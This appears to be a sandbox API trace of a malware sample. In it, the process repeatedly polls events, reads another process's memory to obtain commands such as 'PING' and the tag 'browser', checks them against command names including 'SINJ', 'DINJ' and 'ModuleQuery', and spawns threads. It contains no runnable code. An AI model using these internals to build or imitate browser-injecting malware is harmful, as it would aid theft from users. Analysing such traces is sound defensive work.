	[0222.251] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.251] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.251] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.251] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.251] Sleep (dwMilliseconds=0xbb8) 
	[0222.254] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.254] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0222.254] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225c10
	[0222.254] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x2775b80
	[0222.254] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225c98
	[0222.254] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0222.254] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225c10, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225c10*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0222.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0222.254] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d0d0
	[0222.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225c10, cbMultiByte=-1, lpWideCharStr=0x24d0d0, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0222.254] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x2775b80, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2775b80, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0222.254] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225c98, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225c98*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0222.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225c98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0222.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fd8
	[0222.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225c98, cbMultiByte=-1, lpWideCharStr=0x2777fd8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0222.255] SetEvent (hEvent=0x474) returned 1
	[0222.255] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225c10) returned 1
	[0222.255] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2775b80) returned 1
	[0222.255] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225c98) returned 1
	[0222.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778000
	[0222.255] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0222.255] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0222.255] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0222.255] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0222.255] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0222.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d358
	[0222.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2777fb0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd2c) returned 0x5cc
	[0222.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778028
	[0222.256] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.256] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.256] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778028) returned 1
	[0222.256] Sleep (dwMilliseconds=0xbb8) 
	[0222.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.270] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.270] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.270] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.270] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.270] Sleep (dwMilliseconds=0xbb8) 
	[0222.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.286] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.286] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.286] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.286] Sleep (dwMilliseconds=0xbb8) 
	[0222.301] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.301] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.301] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.301] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.301] Sleep (dwMilliseconds=0xbb8) 
	[0222.318] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.318] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.318] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.318] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.318] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.318] Sleep (dwMilliseconds=0xbb8) 
	[0222.332] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.332] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.333] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.333] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.333] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.333] Sleep (dwMilliseconds=0xbb8) 
	[0222.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.394] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.394] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.394] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.394] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.395] Sleep (dwMilliseconds=0xbb8) 
	[0222.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.452] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.452] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.452] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.452] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.452] Sleep (dwMilliseconds=0xbb8) 
	[0222.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.482] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.482] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.482] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.482] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.482] Sleep (dwMilliseconds=0xbb8) 
	[0222.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.488] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.489] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.489] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.489] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.489] Sleep (dwMilliseconds=0xbb8) 
	[0222.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.504] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.504] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.504] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.504] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.504] Sleep (dwMilliseconds=0xbb8) 
	[0222.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.520] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.520] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.520] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.520] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.520] Sleep (dwMilliseconds=0xbb8) 
	[0222.536] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.536] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.536] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.536] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.536] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.536] Sleep (dwMilliseconds=0xbb8) 
	[0222.552] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.552] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.552] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.552] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.552] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.552] Sleep (dwMilliseconds=0xbb8) 
	[0222.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.567] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.567] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.567] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.567] Sleep (dwMilliseconds=0xbb8) 
	[0222.629] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.629] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.629] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.629] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.629] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.629] Sleep (dwMilliseconds=0xbb8) 
	[0222.675] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.675] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.675] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.675] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.675] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.676] Sleep (dwMilliseconds=0xbb8) 
	[0222.704] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.704] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.704] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.704] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.704] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.704] Sleep (dwMilliseconds=0xbb8) 
	[0222.707] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.707] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.707] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.707] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.707] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.707] Sleep (dwMilliseconds=0xbb8) 
	[0222.722] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778230
	[0222.722] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.722] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.722] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.722] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778230) returned 1
	[0222.723] Sleep (dwMilliseconds=0xbb8) 
	[0222.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f48
	[0222.744] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0222.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225968
	[0222.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ba9c8
	[0222.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0222.744] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0222.745] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225968, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225968*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0222.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0222.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffd80
	[0222.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x22ffd80, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0222.745] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x22ba9c8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ba9c8, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0222.745] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0222.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0222.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737e80
	[0222.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x2737e80, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0222.745] SetEvent (hEvent=0x474) returned 1
	[0222.746] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225968) returned 1
	[0222.746] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0222.746] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0222.746] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0222.746] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0222.746] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0222.746] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0222.746] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0222.746] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0222.746] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffd98
	[0222.746] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2737f48, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x658) returned 0x558
	[0222.747] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27380b0
	[0222.747] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.747] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.747] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27380b0) returned 1
	[0222.747] Sleep (dwMilliseconds=0xbb8) 
	[0222.753] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.753] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.753] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.753] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.754] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.754] Sleep (dwMilliseconds=0xbb8) 
	[0222.769] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.769] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.769] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.769] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.769] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.769] Sleep (dwMilliseconds=0xbb8) 
	[0222.785] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.785] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.785] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.785] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.785] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.785] Sleep (dwMilliseconds=0xbb8) 
	[0222.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.800] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.800] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.800] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.800] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.801] Sleep (dwMilliseconds=0xbb8) 
	[0222.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.816] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.816] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.816] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.816] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.816] Sleep (dwMilliseconds=0xbb8) 
	[0222.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.831] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.831] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.831] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.831] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.831] Sleep (dwMilliseconds=0xbb8) 
	[0222.847] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.847] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.847] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.847] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.847] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.847] Sleep (dwMilliseconds=0xbb8) 
	[0222.862] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.862] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.862] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.862] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.862] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.862] Sleep (dwMilliseconds=0xbb8) 
	[0222.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.878] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.878] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.878] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.878] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.878] Sleep (dwMilliseconds=0xbb8) 
	[0222.906] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.906] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.906] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.906] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.906] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.906] Sleep (dwMilliseconds=0xbb8) 
	[0222.909] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.909] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.909] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.909] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.909] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.909] Sleep (dwMilliseconds=0xbb8) 
	[0222.925] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.925] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.925] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.925] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.925] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.925] Sleep (dwMilliseconds=0xbb8) 
	[0222.940] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.940] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.940] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.940] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.941] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.941] Sleep (dwMilliseconds=0xbb8) 
	[0222.956] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.956] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.956] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.956] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.956] Sleep (dwMilliseconds=0xbb8) 
	[0222.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.972] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.972] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.972] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.972] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.972] Sleep (dwMilliseconds=0xbb8) 
	[0222.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0222.988] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.988] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.988] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.988] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0222.988] Sleep (dwMilliseconds=0xbb8) 
	[0223.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.003] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.004] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.004] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.004] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0223.004] Sleep (dwMilliseconds=0xbb8) 
